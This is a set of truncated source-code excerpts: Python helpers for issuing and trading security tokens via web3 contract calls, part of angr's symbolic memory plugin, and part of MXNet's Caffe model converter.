TokenContract.functions.setContactInformation(attribute['contactInformation']). \
transact({'from': invoker['account_address'], 'gas': 4000000})
TokenContract.functions.setPrivacyPolicy(attribute['privacyPolicy']). \
transact({'from': invoker['account_address'], 'gas': 4000000})
TokenContract.functions.setPersonalInfoAddress(attribute['personalInfoAddress']). \
transact({'from': invoker['account_address'], 'gas': 4000000})
TokenContract.functions.setMemo(attribute['memo']). \
transact({'from': invoker['account_address'], 'gas': 4000000})
TokenContract.functions.setTransferable(True). \
transact({'from': invoker['account_address'], 'gas': 4000000})
return {'address': contract_address, 'abi': abi}
# 債券トークンのリスト登録
def register_bond_list(invoker, bond_token, token_list):
TokenListContract = Contract.get_contract(
'TokenList', token_list['address'])
web3.eth.defaultAccount = invoker['account_address']
tx_hash = TokenListContract.functions.register(
bond_token['address'], 'IbetStraightBond'). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# 債券トークンの募集
def offer_bond_token(invoker, bond_exchange, bond_token, amount, price):
bond_transfer_to_exchange(invoker, bond_exchange, bond_token, amount)
make_sell(invoker, bond_exchange, bond_token, amount, price)
# 取引コントラクトに債券トークンをチャージ
def bond_transfer_to_exchange(invoker, bond_exchange, bond_token, amount):
web3.eth.defaultAccount = invoker['account_address']
TokenContract = Contract.get_contract(
'IbetStraightBond', bond_token['address'])
tx_hash = TokenContract.functions.transfer(bond_exchange['address'], amount). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# 債券の償還
def bond_redeem(invoker, token):
web3.eth.defaultAccount = invoker['account_address']
TokenContract = Contract.get_contract('IbetStraightBond', token['address'])
tx_hash = TokenContract.functions.changeToRedeemed(). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# 債券の譲渡可否変更
def bond_change_transferable(invoker, token, transferable):
web3.eth.defaultAccount = invoker['account_address']
TokenContract = Contract.get_contract('IbetStraightBond', token['address'])
tx_hash = TokenContract.functions.setTransferable(transferable). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# 債券の無効化
def bond_invalidate(invoker, token):
web3.eth.defaultAccount = invoker['account_address']
TokenContract = Contract.get_contract('IbetStraightBond', token['address'])
tx_hash = TokenContract.functions.setStatus(False). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# 債券の譲渡不可
def bond_untransferable(invoker, token):
web3.eth.defaultAccount = invoker['account_address']
TokenContract = Contract.get_contract('IbetStraightBond', token['address'])
tx_hash = TokenContract.functions.setTransferable(False). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
'''
Share Token (株式)
'''
# 株式トークンの発行
def issue_share_token(invoker, attribute):
web3.eth.defaultAccount = invoker['account_address']
arguments = [
attribute['name'],
attribute['symbol'],
attribute['issuePrice'],
attribute['totalSupply'],
attribute['dividends'],
attribute['dividendRecordDate'],
attribute['dividendPaymentDate'],
attribute['cancellationDate'],
attribute['principalValue']
]
contract_address, abi = Contract.deploy_contract(
contract_name='IbetShare',
args=arguments,
deployer=invoker['account_address']
)
TokenContract = Contract.get_contract('IbetShare', contract_address)
if 'tradableExchange' in attribute:
TokenContract.functions.setTradableExchange(to_checksum_address(attribute['tradableExchange'])). \
transact({'from': invoker['account_address'], 'gas': 4000000})
if 'personalInfoAddress' in attribute:
TokenContract.functions.setPersonalInfoAddress(to_checksum_address(attribute['personalInfoAddress'])). \
transact({'from': invoker['account_address'], 'gas': 4000000})
if 'contactInformation' in attribute:
TokenContract.functions.setContactInformation(attribute['contactInformation']). \
transact({'from': invoker['account_address'], 'gas': 4000000})
if 'privacyPolicy' in attribute:
TokenContract.functions.setPrivacyPolicy(attribute['privacyPolicy']). \
transact({'from': invoker['account_address'], 'gas': 4000000})
if 'memo' in attribute:
TokenContract.functions.setMemo(attribute['memo']). \
transact({'from': invoker['account_address'], 'gas': 4000000})
if 'transferable' in attribute:
TokenContract.functions.setTransferable(attribute['transferable']). \
transact({'from': invoker['account_address'], 'gas': 4000000})
time.sleep(3)
return {'address': contract_address, 'abi': abi}
# 株式トークンのリスト登録
def register_share_list(invoker, share_token, token_list):
TokenListContract = Contract.get_contract(
'TokenList', token_list['address'])
web3.eth.defaultAccount = invoker['account_address']
tx_hash = TokenListContract.functions.register(
share_token['address'], 'IbetShare'). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# 株式Tokenの募集(売出)
def share_offer(invoker, exchange, token, amount, price):
share_transfer_to_exchange(invoker, exchange, token, amount)
make_sell(invoker, exchange, token, amount, price)
# 取引コントラクトに株式トークンをチャージ
def share_transfer_to_exchange(invoker, exchange, token, amount):
web3.eth.defaultAccount = invoker['account_address']
TokenContract = Contract. \
get_contract('IbetShare', token['address'])
tx_hash = TokenContract.functions. \
transfer(exchange['address'], amount). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# 株式トークンの無効化
def invalidate_share_token(invoker, token):
web3.eth.defaultAccount = invoker['account_address']
ShareTokenContract = Contract.get_contract('IbetShare', token['address'])
tx_hash = ShareTokenContract.functions.setStatus(False). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# 株式トークンの譲渡不可
def untransferable_share_token(invoker, token):
web3.eth.defaultAccount = invoker['account_address']
ShareTokenContract = Contract.get_contract('IbetShare', token['address'])
tx_hash = ShareTokenContract.functions.setTransferable(False). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
'''
Coupon Token (クーポン)
'''
# クーポントークンの発行
def issue_coupon_token(invoker, attribute):
web3.eth.defaultAccount = invoker['account_address']
arguments = [
attribute['name'], attribute['symbol'], attribute['totalSupply'],
attribute['tradableExchange'],
attribute['details'], attribute['returnDetails'], attribute['memo'],
attribute['expirationDate'], attribute['transferable'],
attribute['contactInformation'], attribute['privacyPolicy']
]
contract_address, abi = Contract.deploy_contract(
'IbetCoupon', arguments, invoker['account_address'])
return {'address': contract_address, 'abi': abi}
# クーポンTokenの公開リスト登録
def coupon_register_list(invoker, token, token_list):
web3.eth.defaultAccount = invoker['account_address']
TokenListContract = Contract. \
get_contract('TokenList', token_list['address'])
tx_hash = TokenListContract.functions. \
register(token['address'], 'IbetCoupon'). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# クーポントークンの割当
def transfer_coupon_token(invoker, coupon_token, to, value):
web3.eth.defaultAccount = invoker['account_address']
coupon_contract = Contract.get_contract(
'IbetCoupon', coupon_token['address'])
tx_hash = coupon_contract.functions.transfer(to, value). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# クーポントークンの無効化
def invalidate_coupon_token(invoker, coupon_token):
web3.eth.defaultAccount = invoker['account_address']
CouponTokenContract = Contract.get_contract(
'IbetCoupon', coupon_token['address'])
tx_hash = CouponTokenContract.functions. \
setStatus(False). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# クーポントークンの譲渡不可
def untransferable_coupon_token(invoker, coupon_token):
web3.eth.defaultAccount = invoker['account_address']
CouponTokenContract = Contract.get_contract(
'IbetCoupon', coupon_token['address'])
tx_hash = CouponTokenContract.functions. \
setTransferable(False). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# クーポントークンの消費
def consume_coupon_token(invoker, coupon_token, value):
web3.eth.defaultAccount = invoker['account_address']
CouponTokenContract = Contract.get_contract(
'IbetCoupon', coupon_token['address'])
tx_hash = CouponTokenContract.functions. \
consume(value). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# クーポントークンの売出
def coupon_offer(invoker, exchange, token, amount, price):
coupon_transfer_to_exchange(invoker, exchange, token, amount)
make_sell(invoker, exchange, token, amount, price)
# クーポンDEXコントラクトにクーポントークンをデポジット
def coupon_transfer_to_exchange(invoker, exchange, token, amount):
web3.eth.defaultAccount = invoker['account_address']
TokenContract = Contract. \
get_contract('IbetCoupon', token['address'])
tx_hash = TokenContract.functions. \
transfer(exchange['address'], amount). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
'''
Membership Token (会員権)
'''
# 会員権Tokenの発行
def membership_issue(invoker, attribute):
web3.eth.defaultAccount = invoker['account_address']
arguments = [
attribute['name'], attribute['symbol'], attribute['initialSupply'],
attribute['tradableExchange'],
attribute['details'], attribute['returnDetails'],
attribute['expirationDate'], attribute['memo'],
attribute['transferable'],
attribute['contactInformation'], attribute['privacyPolicy']
]
contract_address, abi = Contract. \
deploy_contract('IbetMembership', arguments,
invoker['account_address'])
return {'address': contract_address, 'abi': abi}
# 会員権Tokenの公開リスト登録
def membership_register_list(invoker, token, token_list):
web3.eth.defaultAccount = invoker['account_address']
TokenListContract = Contract. \
get_contract('TokenList', token_list['address'])
tx_hash = TokenListContract.functions. \
register(token['address'], 'IbetMembership'). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# 会員権Tokenの無効化
def membership_invalidate(invoker, token):
web3.eth.defaultAccount = invoker['account_address']
TokenContract = Contract. \
get_contract('IbetMembership', token['address'])
tx_hash = TokenContract.functions. \
setStatus(False). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# 会員権Tokenの譲渡不可
def membership_untransferable(invoker, token):
web3.eth.defaultAccount = invoker['account_address']
TokenContract = Contract. \
get_contract('IbetMembership', token['address'])
tx_hash = TokenContract.functions. \
setTransferable(False). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# 会員権Tokenの募集(売出)
def membership_offer(invoker, exchange, token, amount, price):
membership_transfer_to_exchange(invoker, exchange, token, amount)
make_sell(invoker, exchange, token, amount, price)
# 会員権DEXコントラクトに会員権Tokenをデポジット
def membership_transfer_to_exchange(invoker, exchange, token, amount):
web3.eth.defaultAccount = invoker['account_address']
TokenContract = Contract. \
get_contract('IbetMembership', token['address'])
tx_hash = TokenContract.functions. \
transfer(exchange['address'], amount). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
'''
DEX
'''
# Tokenの売りMake注文
def make_sell(invoker, exchange, token, amount, price):
web3.eth.defaultAccount = invoker['account_address']
ExchangeContract = Contract. \
get_contract('IbetExchange', exchange['address'])
agent = eth_account['agent']
tx_hash = ExchangeContract.functions. \
createOrder(token['address'], amount, price, False, agent['account_address']). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# Tokenの買いTake注文
def take_buy(invoker, exchange, order_id, amount):
web3.eth.defaultAccount = invoker['account_address']
ExchangeContract = Contract. \
get_contract('IbetExchange', exchange['address'])
tx_hash = ExchangeContract.functions. \
executeOrder(order_id, amount, True). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# Tokenの買いMake注文
def make_buy(invoker, exchange, token, amount, price):
web3.eth.defaultAccount = invoker['account_address']
ExchangeContract = Contract. \
get_contract('IbetExchange', exchange['address'])
agent = eth_account['agent']
tx_hash = ExchangeContract.functions. \
createOrder(token['address'], amount, price, True, agent['account_address']). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# Tokenの売りTake注文
def take_sell(invoker, exchange, order_id, amount):
web3.eth.defaultAccount = invoker['account_address']
ExchangeContract = Contract. \
get_contract('IbetExchange', exchange['address'])
tx_hash = ExchangeContract.functions. \
executeOrder(order_id, amount, False). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# 直近注文IDを取得
def get_latest_orderid(exchange):
ExchangeContract = Contract. \
get_contract('IbetExchange', exchange['address'])
latest_orderid = ExchangeContract.functions.latestOrderId().call()
return latest_orderid
# 注文の取消
def cancel_order(invoker, exchange, order_id):
web3.eth.defaultAccount = invoker['account_address']
ExchangeContract = Contract. \
get_contract('IbetExchange', exchange['address'])
tx_hash = ExchangeContract.functions. \
cancelOrder(order_id). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# 注文の強制取消
def force_cancel_order(invoker, exchange, order_id):
web3.eth.defaultAccount = invoker['account_address']
ExchangeContract = Contract. \
get_contract('IbetExchange', exchange['address'])
tx_hash = ExchangeContract.functions. \
forceCancelOrder(order_id). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# 直近約定IDを取得
def get_latest_agreementid(exchange, order_id):
ExchangeContract = Contract. \
get_contract('IbetExchange', exchange['address'])
latest_agreementid = \
ExchangeContract.functions.latestAgreementId(order_id).call()
return latest_agreementid
# 約定の資金決済
def confirm_agreement(invoker, exchange, order_id, agreement_id):
web3.eth.defaultAccount = invoker['account_address']
ExchangeContract = Contract. \
get_contract('IbetExchange', exchange['address'])
tx_hash = ExchangeContract.functions. \
confirmAgreement(order_id, agreement_id). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# 約定の取消
def cancel_agreement(invoker, exchange, order_id, agreement_id):
web3.eth.defaultAccount = invoker['account_address']
ExchangeContract = Contract. \
get_contract('IbetExchange', exchange['address'])
tx_hash = ExchangeContract.functions. \
cancelAgreement(order_id, agreement_id). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# エスクローの作成
def create_security_token_escrow(invoker, exchange, token, recipient_address, agent_address, amount):
web3.eth.defaultAccount = invoker['account_address']
IbetSecurityTokenEscrowContract = Contract. \
get_contract('IbetSecurityTokenEscrow', exchange['address'])
tx_hash = IbetSecurityTokenEscrowContract.functions. \
createEscrow(token['address'], recipient_address, amount, agent_address, "{}", "{}"). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
def get_latest_security_escrow_id(exchange):
IbetSecurityTokenEscrowContract = Contract. \
get_contract('IbetSecurityTokenEscrow', | |
<filename>angr/state_plugins/symbolic_memory.py<gh_stars>1-10
from collections import defaultdict
import logging
import itertools
l = logging.getLogger(name=__name__)
import claripy
from ..storage.memory import SimMemory, DUMMY_SYMBOLIC_READ_VALUE
from ..storage.paged_memory import SimPagedMemory
from ..storage.memory_object import SimMemoryObject
from ..sim_state_options import SimStateOptions
from ..misc.ux import once
DEFAULT_MAX_SEARCH = 8
class MultiwriteAnnotation(claripy.Annotation):
@property
def eliminatable(self):
return False
@property
def relocateable(self):
return True
def _multiwrite_filter(mem, ast): #pylint:disable=unused-argument
# this is a huge hack, but so is the whole multiwrite crap
return any(isinstance(a, MultiwriteAnnotation) for a in ast._uneliminatable_annotations)
class SimSymbolicMemory(SimMemory): #pylint:disable=abstract-method
_CONCRETIZATION_STRATEGIES = [ 'symbolic', 'symbolic_approx', 'any', 'any_approx', 'max', 'max_approx',
'symbolic_nonzero', 'symbolic_nonzero_approx', 'norepeats' ]
_SAFE_CONCRETIZATION_STRATEGIES = [ 'symbolic', 'symbolic_approx' ]
def __init__(
self, memory_backer=None, permissions_backer=None, mem=None, memory_id="mem",
endness=None, abstract_backer=False, check_permissions=None,
read_strategies=None, write_strategies=None, stack_region_map=None, generic_region_map=None
):
SimMemory.__init__(self,
endness=endness,
abstract_backer=abstract_backer,
stack_region_map=stack_region_map,
generic_region_map=generic_region_map
)
self.id = memory_id
if check_permissions is None:
check_permissions = self.category == 'mem'
self.mem = SimPagedMemory(
memory_backer=memory_backer,
permissions_backer=permissions_backer,
check_permissions=check_permissions
) if mem is None else mem
# set up the strategies
self.read_strategies = read_strategies
self.write_strategies = write_strategies
#
# Lifecycle management
#
@SimMemory.memo
def copy(self, _):
"""
Return a copy of the SimMemory.
"""
#l.debug("Copying %d bytes of memory with id %s." % (len(self.mem), self.id))
c = SimSymbolicMemory(
mem=self.mem.branch(),
memory_id=self.id,
endness=self.endness,
abstract_backer=self._abstract_backer,
read_strategies=[ s.copy() for s in self.read_strategies ],
write_strategies=[ s.copy() for s in self.write_strategies ],
stack_region_map=self._stack_region_map,
generic_region_map=self._generic_region_map
)
return c
#
# Merging stuff
#
def _changes_to_merge(self, others):
changed_bytes = set()
for o in others: # pylint:disable=redefined-outer-name
changed_bytes |= self.changed_bytes(o)
return changed_bytes
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
"""
Merge this SimMemory with the other SimMemory
"""
changed_bytes = self._changes_to_merge(others)
l.info("Merging %d bytes", len(changed_bytes))
l.info("... %s has changed bytes %s", self.id, changed_bytes)
self.read_strategies = self._merge_strategies(self.read_strategies, *[
o.read_strategies for o in others
])
self.write_strategies = self._merge_strategies(self.write_strategies, *[
o.write_strategies for o in others
])
merged_bytes = self._merge(others, changed_bytes, merge_conditions=merge_conditions)
return len(merged_bytes) > 0
@staticmethod
def _merge_strategies(*strategy_lists):
if len(set(len(sl) for sl in strategy_lists)) != 1:
raise SimMergeError("unable to merge memories with amounts of strategies")
merged_strategies = [ ]
for strategies in zip(*strategy_lists):
if len(set(s.__class__ for s in strategies)) != 1:
raise SimMergeError("unable to merge memories with different types of strategies")
unique = list(set(strategies))
if len(unique) > 1:
unique[0].merge(unique[1:])
merged_strategies.append(unique[0])
return merged_strategies
def widen(self, others):
changed_bytes = self._changes_to_merge(others)
l.info("Memory %s widening bytes %s", self.id, changed_bytes)
self._merge(others, changed_bytes, is_widening=True)
return len(changed_bytes) > 0
def _merge(self, others, changed_bytes, merge_conditions=None, is_widening=False):
all_memories = [self] + others
if merge_conditions is None:
merge_conditions = [ None ] * len(all_memories)
merged_to = None
merged_objects = set()
merged_bytes = set()
for b in sorted(changed_bytes):
if merged_to is not None and not b >= merged_to:
l.info("merged_to = %d ... already merged byte 0x%x", merged_to, b)
continue
l.debug("... on byte 0x%x", b)
memory_objects = []
unconstrained_in = []
# first get a list of all memory objects at that location, and
# all memories that don't have those bytes
for sm, fv in zip(all_memories, merge_conditions):
if b in sm.mem:
l.info("... present in %s", fv)
memory_objects.append((sm.mem[b], fv))
else:
l.info("... not present in %s", fv)
unconstrained_in.append((sm, fv))
mos = set(mo for mo,_ in memory_objects)
mo_bases = set(mo.base for mo, _ in memory_objects)
mo_lengths = set(mo.length for mo, _ in memory_objects)
if not unconstrained_in and not (mos - merged_objects):
continue
# first, optimize the case where we are dealing with the same-sized memory objects
if len(mo_bases) == 1 and len(mo_lengths) == 1 and not unconstrained_in:
our_mo = self.mem[b]
to_merge = [(mo.object, fv) for mo, fv in memory_objects]
# Update `merged_to`
mo_base = list(mo_bases)[0]
merged_to = mo_base + list(mo_lengths)[0]
merged_val = self._merge_values(
to_merge, memory_objects[0][0].length, is_widening=is_widening
)
if options.ABSTRACT_MEMORY in self.state.options:
# merge check for abstract memory
if not to_merge[0][0].uninitialized and self.state.solver.backends.vsa.identical(merged_val, to_merge[0][0]):
continue
# do the replacement
new_object = self.mem.replace_memory_object(our_mo, merged_val)
merged_objects.add(new_object)
merged_objects.update(mos)
merged_bytes.add(b)
else:
# get the size that we can merge easily. This is the minimum of
# the size of all memory objects and unallocated spaces.
min_size = min([mo.length - (b - mo.base) for mo, _ in memory_objects])
for um, _ in unconstrained_in:
for i in range(0, min_size):
if b + i in um:
min_size = i
break
merged_to = b + min_size
l.info("... determined minimum size of %d", min_size)
# Now, we have the minimum size. We'll extract/create expressions of that
# size and merge them
extracted = [(mo.bytes_at(b, min_size), fv) for mo, fv in memory_objects] if min_size != 0 else []
created = [
(self.get_unconstrained_bytes("merge_uc_%s_%x" % (uc.id, b), min_size * self.state.arch.byte_width), fv) for
uc, fv in unconstrained_in
]
to_merge = extracted + created
merged_val = self._merge_values(to_merge, min_size, is_widening=is_widening)
if options.ABSTRACT_MEMORY in self.state.options:
# merge check for abstract memory
if (not unconstrained_in or not unconstrained_in[0][0] is self) \
and self.state.solver.backends.vsa.identical(merged_val, to_merge[0][0]):
continue
self.store(b, merged_val, endness='Iend_BE', inspect=False) # do not convert endianness again
merged_bytes.add(b)
return merged_bytes
def set_state(self, state):
super(SimSymbolicMemory, self).set_state(state)
self.mem.state = state._get_weakref()
if self.state is not None:
if self.read_strategies is None:
self._create_default_read_strategies()
if self.write_strategies is None:
self._create_default_write_strategies()
def _create_default_read_strategies(self):
self.read_strategies = [ ]
if options.APPROXIMATE_MEMORY_INDICES in self.state.options:
# first, we try to resolve the read address by approximation
self.read_strategies.append(
concretization_strategies.SimConcretizationStrategyRange(1024, exact=False),
)
# then, we try symbolic reads, with a maximum width of a kilobyte
self.read_strategies.append(
concretization_strategies.SimConcretizationStrategyRange(1024)
)
if options.CONSERVATIVE_READ_STRATEGY not in self.state.options:
# finally, we concretize to any one solution
self.read_strategies.append(
concretization_strategies.SimConcretizationStrategyAny(),
)
def _create_default_write_strategies(self):
self.write_strategies = [ ]
if options.APPROXIMATE_MEMORY_INDICES in self.state.options:
if options.SYMBOLIC_WRITE_ADDRESSES not in self.state.options:
# we try to resolve a unique solution by approximation
self.write_strategies.append(
concretization_strategies.SimConcretizationStrategySingle(exact=False),
)
else:
# we try a solution range by approximation
self.write_strategies.append(
concretization_strategies.SimConcretizationStrategyRange(128, exact=False)
)
if options.SYMBOLIC_WRITE_ADDRESSES in self.state.options:
# we try to find a range of values
self.write_strategies.append(
concretization_strategies.SimConcretizationStrategyRange(128)
)
else:
# we try to find a range of values, but only for ASTs annotated with the multiwrite annotation
self.write_strategies.append(concretization_strategies.SimConcretizationStrategyRange(
128,
filter=_multiwrite_filter
))
# finally, we just grab the maximum solution
if options.CONSERVATIVE_WRITE_STRATEGY not in self.state.options:
self.write_strategies.append(
concretization_strategies.SimConcretizationStrategyMax()
)
#
# Symbolicizing!
#
def make_symbolic(self, name, addr, length=None):
"""
Replaces `length` bytes starting at `addr` with a symbolic variable named name. Adds a constraint equaling that
symbolic variable to the value previously at `addr`, and returns the variable.
"""
l.debug("making %s bytes symbolic", length)
if isinstance(addr, str):
addr, length = self.state.arch.registers[addr]
else:
if length is None:
raise Exception("Unspecified length!")
r = self.load(addr, length)
v = self.get_unconstrained_bytes(name, r.size())
self.store(addr, v)
self.state.add_constraints(r == v)
l.debug("... eq constraints: %s", r == v)
return v
#
# Address concretization
#
def _resolve_size_range(self, size):
if not self.state.solver.symbolic(size):
i = self.state.solver.eval(size)
if i > self._maximum_concrete_size:
raise SimMemoryLimitError("Concrete size %d outside of allowable limits" % i)
return i, i
if options.APPROXIMATE_MEMORY_SIZES in self.state.options:
max_size_approx = self.state.solver.max_int(size, exact=True)
min_size_approx = self.state.solver.min_int(size, exact=True)
if max_size_approx < self._maximum_symbolic_size_approx:
return min_size_approx, max_size_approx
max_size = self.state.solver.max_int(size)
min_size = self.state.solver.min_int(size)
if min_size > self._maximum_symbolic_size:
self.state.history.add_event('memory_limit', message="Symbolic size %d outside of allowable limits" % min_size, size=size)
if options.BEST_EFFORT_MEMORY_STORING not in self.state.options:
raise SimMemoryLimitError("Symbolic size %d outside of allowable limits" % min_size)
else:
min_size = self._maximum_symbolic_size
return min_size, min(max_size, self._maximum_symbolic_size)
#
# Concretization strategies
#
def _apply_concretization_strategies(self, addr, strategies, action):
"""
Applies concretization strategies on the address until one of them succeeds.
"""
# we try all the strategies in order
for s in strategies:
# first, we trigger the SimInspect breakpoint and give it a chance to intervene
e = addr
self.state._inspect(
'address_concretization', BP_BEFORE, address_concretization_strategy=s,
address_concretization_action=action, address_concretization_memory=self,
address_concretization_expr=e, address_concretization_add_constraints=True
)
s = self.state._inspect_getattr('address_concretization_strategy', s)
e = self.state._inspect_getattr('address_concretization_expr', addr)
# if the breakpoint None'd out the strategy, we skip it
if s is None:
continue
# let's try to apply it!
try:
a = s.concretize(self, e)
except SimUnsatError:
a = None
# trigger the AFTER breakpoint and give it a chance to intervene
self.state._inspect(
'address_concretization', BP_AFTER,
address_concretization_result=a
)
a = self.state._inspect_getattr('address_concretization_result', a)
# return the result if not None!
if a is not None:
return a
# well, we tried
raise SimMemoryAddressError(
"Unable to concretize address for %s with the provided strategies." % action
)
def concretize_write_addr(self, addr, strategies=None):
"""
Concretizes an address meant for writing.
:param addr: An expression for the address.
:param strategies: A list of concretization strategies (to | |
<filename>example/ssd/tools/caffe_converter/convert_symbol.py<gh_stars>0
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
from google.protobuf import text_format
import argparse
import re
import sys
import math
caffe_flag = True
try:
import caffe
from caffe.proto import caffe_pb2
except ImportError:
caffe_flag = False
import caffe_parse.caffe_pb2
def read_proto_solver_file(file_path):
solver_config = ''
if caffe_flag:
solver_config = caffe.proto.caffe_pb2.NetParameter()
else:
solver_config = caffe_parse.caffe_pb2.NetParameter()
return read_proto_file(file_path, solver_config)
def read_proto_file(file_path, parser_object):
file = open(file_path, "r")
if not file:
raise Exception("ERROR (" + file_path + ")!")
text_format.Merge(str(file.read()), parser_object)
file.close()
return parser_object
def conv_param_to_string(param):
pad = 0
if isinstance(param.pad, int):
pad = param.pad
else:
pad = 0 if len(param.pad) == 0 else param.pad[0]
stride = 1
if isinstance(param.stride, int):
stride = param.stride
else:
stride = 1 if len(param.stride) == 0 else param.stride[0]
kernel_size = ''
if isinstance(param.kernel_size, int):
kernel_size = param.kernel_size
else:
kernel_size = param.kernel_size[0]
dilate = 1
if isinstance(param.dilation, int):
dilate = param.dilation
else:
dilate = 1 if len(param.dilation) == 0 else param.dilation[0]
# convert to string except for dilation
param_string = "num_filter=%d, pad=(%d,%d), kernel=(%d,%d), stride=(%d,%d), no_bias=%s" % \
(param.num_output, pad, pad, kernel_size, kernel_size, stride, stride, not param.bias_term)
# deal with dilation. Won't be in deconvolution
if dilate > 1:
param_string += ", dilate=(%d, %d)" % (dilate, dilate)
return param_string
def find_layer(layers, name):
for layer in layers:
if layer.name == name:
return layer
return None
def proto2script(proto_file):
proto = read_proto_solver_file(proto_file)
connection = dict()
symbols = dict()
top = dict()
flatten_count = 0
symbol_string = ""
layer = ''
if len(proto.layer):
layer = proto.layer
elif len(proto.layers):
layer = proto.layers
else:
raise Exception('Invalid proto file.')
# Get input size to network
input_dim = [1, 3, 224, 224] # default
if len(proto.input_dim) > 0:
input_dim = proto.input_dim
elif len(proto.input_shape) > 0:
input_dim = proto.input_shape[0].dim
elif layer[0].type == "Input":
input_dim = layer[0].input_param.shape._values[0].dim
layer.pop(0)
else:
raise Exception('Invalid proto file.')
# We assume the first bottom blob of first layer is the output from data layer
input_name = layer[0].bottom[0]
output_name = ""
mapping = {input_name: 'data'}
need_flatten = {input_name: False}
for i in range(len(layer)):
type_string = ''
param_string = ''
name = re.sub('[-/]', '_', layer[i].name)
from_name = 'data='
bottom_order = []
if layer[i].type == 'Convolution' or layer[i].type == 4:
type_string = 'mx.symbol.Convolution'
param_string = conv_param_to_string(layer[i].convolution_param)
need_flatten[name] = True
if layer[i].type == 'Deconvolution' or layer[i].type == 39:
type_string = 'mx.symbol.Deconvolution'
param_string = conv_param_to_string(layer[i].convolution_param)
need_flatten[name] = True
if layer[i].type == 'Pooling' or layer[i].type == 17:
type_string = 'mx.symbol.Pooling'
param = layer[i].pooling_param
param_string = ''
param_string += "pooling_convention='full', "
if param.global_pooling:
# there must be a param `kernel` in a pooling layer
param_string += "global_pool=True, kernel=(1,1)"
else:
param_string += "pad=(%d,%d), kernel=(%d,%d), stride=(%d,%d)" % \
(param.pad, param.pad, param.kernel_size, param.kernel_size, param.stride, param.stride)
if param.pool == 0:
param_string += ", pool_type='max'"
elif param.pool == 1:
param_string += ", pool_type='avg'"
else:
raise Exception("Unknown Pooling Method!")
need_flatten[name] = True
if layer[i].type == 'ReLU' or layer[i].type == 18:
type_string = 'mx.symbol.Activation'
param_string = "act_type='relu'"
need_flatten[name] = need_flatten[mapping[layer[i].bottom[0]]]
if layer[i].type == 'TanH' or layer[i].type == 23:
type_string = 'mx.symbol.Activation'
param_string = "act_type='tanh'"
need_flatten[name] = need_flatten[mapping[layer[i].bottom[0]]]
if layer[i].type == 'Sigmoid' or layer[i].type == 19:
type_string = 'mx.symbol.Activation'
param_string = "act_type='sigmoid'"
need_flatten[name] = need_flatten[mapping[layer[i].bottom[0]]]
if layer[i].type == 'LRN' or layer[i].type == 15:
type_string = 'mx.symbol.LRN'
param = layer[i].lrn_param
param_string = "alpha=%f, beta=%f, knorm=%f, nsize=%d" % \
(param.alpha, param.beta, param.k, param.local_size)
need_flatten[name] = True
if layer[i].type == 'InnerProduct' or layer[i].type == 14:
type_string = 'mx.symbol.FullyConnected'
param = layer[i].inner_product_param
param_string = "num_hidden=%d, no_bias=%s" % (param.num_output, not param.bias_term)
need_flatten[name] = False
if layer[i].type == 'Dropout' or layer[i].type == 6:
type_string = 'mx.symbol.Dropout'
param = layer[i].dropout_param
